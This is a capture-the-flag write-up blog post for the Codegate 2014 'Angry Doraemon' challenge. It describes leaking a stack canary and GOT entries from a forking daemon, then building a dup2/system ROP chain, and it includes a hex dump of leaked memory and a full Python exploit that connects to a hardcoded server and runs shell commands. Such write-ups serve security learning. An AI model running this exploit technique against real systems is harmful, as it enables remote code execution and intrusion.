We are given a binary of accept-fork network demon from 58.229.183.18 / 8888. the binary has NX enabled but there is no PIE. The task tells us that the server version is Ubuntu 13.10. Therefore we have the libc binary as well.

There are a lot of bugs and vulnerability points, however, most of them are not exploitable. The only exploitable bug is at sub_8048fc6.

It is a very simple stack-based BOF. the challenge is that the stack is protected by canary. however we can leak the canary using "sprintf". the memory distance between buf and canary is 0xA. but we can overwrite the buf up to 0x6e. This situation is exploitable because the binary is forking (canary value and GOT entries are inherited). If the binary is a super daemon we cannot exploit this situation. However, since the daemon is forking, we can bypass ALSR, Canary by leaking the GOT, Canary information. Once we leak the GOT and Canary values, we are ready to build our ROP exploit payload


First, we get canary by giving precisely 0xA+1 length of buf input (we give 1 byte more since the lower byte of canary is always NULL).

stack cookie: 0x84c38b00


Then we leak the GOT with "read" function.

// leaked GOT information from server

00000e60  6f 75 20 73 75 72 65 3f  20 28 79 2f 6e 29 20 0a  |ou sure? (y/n) .|

00000e70  

14 af 04 08 

38 99 74 b7  

90 c9 73 b7 

c0 1a 65 b7

90 e8 63 b7 

50 84 61 b7  

46 86 04 08 a0 71 66 b7  |..c.P.a.F....qf.|

00000e90  80 15 65 b7 30 82 61 b7  86 86 04 08 96 86 04 08  |..e.0.a.........|

00000ea0  90 e3 63 b7 c0 37 5e b7  10 78 57 b7 d6 86 04 08  |..c..7^..xW.....|

00000eb0  10 e9 63 b7 00 16 65 b7  a0 5c 69 b7 16 87 04 08  |..c...e..\i.....|

00000ec0  a0 87 61 b7 d0 d5 58 b7  90 71 66 b7 80 17 65 b7  |..a...X..qf...e.|

00000ed0  50 c8 5a b7 40 1b 65 b7  10 cd 58 b7 10 e8 63 b7  |P.Z.@.e...X...c.|

00000ee0  00 00 00 00 00 00 00 00  64 00 00 00 00 00 00 00  |........d.......|

00000ef0  80 e9 70 b7 00 00 00 00  00 00 00 00 00 00 00 00  |..p.............|

00000f00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|


Using the leaked information, we calculate the pppr gadget and dup2 from Ubuntu13.10 libc (the angry bird binary has system("sh") function hard coded in binary, so the only thing we need is dup2 and pppr)

below is the final ROP payload we want.

[&dup2][&pppr][4][0][&dup2][&system("sh")][4][1]


After succeeding from local server, we also got shell from remote server.


# final exploit (python)

from socket import *

from struct import *

import sys, os, time, base64, ctypes


''' game start! '''

s = socket(AF_INET, SOCK_STREAM)


#s.connect( ('localhost', 8888) )

#cookie = 0x9e0dc000


s.connect( ('58.229.183.18', 8888) )

cookie = 0x84c38b00


r = s.recv(4096)

print r


raw_input()


time.sleep(3)


s.send('4\n')

r = s.recv(4096)

print r


''' stage 1 : got leak 


sh = 0x8048c62

read = 0xb76ecc50

ppr = read - 0x52A8

dup2 = read + 0x960 

got = 0x804b000

write = 0x80486E0



payload = 'A'*10

payload += pack('L', cookie)

payload += 'B'*12

payload += pack('<L', write)

payload += pack('<L', 0xdeadbeef)

payload += pack('<L', 4)

payload += pack('<L', got)

payload += pack('<L', 256)

'''


sh = 0x8048c62

read = 0xb763e890

ppr = read - 0x52A8

dup2 = read + 0x960 


payload = 'A'*10

payload += pack('L', cookie)

payload += 'B'*12

payload += pack('<L', dup2)

payload += pack('<L', ppr)

payload += pack('<L', 4)

payload += pack('<L', 0)

payload += pack('<L', dup2)

payload += pack('<L', sh)

payload += pack('<L', 4)

payload += pack('<L', 1)


s.send( payload + '\n' )

r = s.recv(4096)

print r

s.send( '/bin/cat key\n' )

r = s.recv(4096)

print r

s.send( 'id\n' )

r = s.recv(4096)

print r

s.send( 'id\n' )

r = s.recv(4096)

print r



'Games > CTF' 카테고리의 다른 글

PlaidCTF 2014 hudak  (0) 2014.04.14
Codegate 2014 4stone writeup  (0) 2014.03.03
Codegate 2014 Angry Doraemon Writeup  (0) 2014.03.03
Olympic CTF 2014 Echof writeup  (1) 2014.02.10
PHDays 2014 miXer  (0) 2014.01.27
PHDays 2014 FreeBDSM  (0) 2014.01.27
Posted by daehee87

댓글을 달아 주세요